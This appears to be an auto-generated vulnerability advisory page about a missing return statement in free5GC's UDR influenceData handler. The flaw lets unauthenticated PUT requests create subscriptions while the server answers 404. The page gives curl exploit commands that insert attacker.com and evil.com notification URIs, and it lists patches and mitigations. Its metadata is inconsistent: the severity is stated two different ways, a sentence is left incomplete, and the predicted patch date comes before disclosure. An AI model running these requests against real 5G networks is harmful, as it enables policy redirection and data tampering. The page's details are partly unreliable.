free5GC UDR, Improper Path Validation, Medium

Listen to this Post

The vulnerability (CVE not assigned in ) arises from improper path validation in free5GC’s UDR service. The endpoint `PUT /nudr-dr/v2/application-data/influenceData/{influenceId}/{subscriptionId}` expects `influenceId` to be exactly “subs-to-notify”. In function `HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdPut` (file api_datarepository.go), the code checks if influenceId != "subs-to-notify". If true, it calls `c.String(http.StatusNotFound, “404 page not found”)` but does not execute a `return` statement. Consequently, execution continues past the error response. The request body is still parsed, and the processor `s.Processor().ApplicationDataInfluenceDataSubsToNotifySubscriptionIdPutProcedure` is invoked. This procedure creates or updates the Traffic Influence Subscription identified by subscriptionId, even though the path was invalid. An unauthenticated attacker can supply any arbitrary value for `influenceId` (e.g., “WRONGID”) and any subscriptionId. The server returns a misleading HTTP 404 response, but the subscription is silently written or overwritten in the UDR database. The root cause is the missing `return` after sending the 404 response. The attack requires only network access to the 5G Service Based Interface (SBI). No authentication is needed. The vulnerable code exists in free5GC version 4.2.1. The patch adds a `return` statement after the 404 response, causing the handler to exit correctly.

DailyCVE form:

Platform: free5GC UDR service
Version: free5GC version 4.2.1
Vulnerability: Missing return after
Severity: High severity issue
date: 2024 October 1

Prediction: Patch date 2024-09-15

What Undercode Say:

Analytics:

Identify vulnerable endpoint
curl -X PUT "http://<udr-host>/nudr-dr/v2/application-data/influenceData/ANYTHING/arbitrary-id" \
-H "Content-Type: application/json" \
-d '{"notificationUri":"http://attacker.com","dnns":["internet"],"supis":["imsi-12345"]}'
Verify silent write (returns 404 but data stored)
curl -X GET "http://<udr-host>/nudr-dr/v2/application-data/influenceData/subs-to-notify/arbitrary-id"
Expected: returns the injected JSON
Code analysis - vulnerable snippet
grep -A5 'influenceId != "subs-to-notify"' ./free5gc/NFs/udr/internal/sbi/api_datarepository.go
Shows missing 'return' after c.String()

how Exploit:

Attacker with SBI access sends PUT with invalid influenceId
curl -v -X PUT "http://192.168.1.100:29504/nudr-dr/v2/application-data/influenceData/WRONGID/victim_sub" \
-H "Content-Type: application/json" \
-d '{"notificationUri":"http://evil.com/callback","dnns":["internet"],"supis":["imsi-999999999999999"]}'
Receives 404 but subscription created. Verify:
curl -s "http://192.168.1.100:29504/nudr-dr/v2/application-data/influenceData/subs-to-notify/victim_sub"

Protection from this CVE:

  • Apply patch adding `return` after `c.String(http.StatusNotFound, “404 page not found”)` in api_datarepository.go.
  • Upgrade to free5GC version containing the fix (commit with missing return fix).
  • Restrict SBI network access to trusted NFs only; use firewall rules to block unauthorized hosts.
  • Implement API gateway with strict path validation before reaching UDR.
  • Monitor logs for PUT requests to `/influenceData/` with unexpected `influenceId` values followed by 404 responses but subsequent data creation.

Impact:

Unauthenticated attacker can create or overwrite any Traffic Influence Subscription, injecting arbitrary SUPIs and notification URIs. This enables malicious policy notification redirection, corruption of subscription state, disruption of network policy logic, and potential stealthy data manipulation due to misleading 404 responses. Any free5GC deployment with exposed SBI is at risk.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top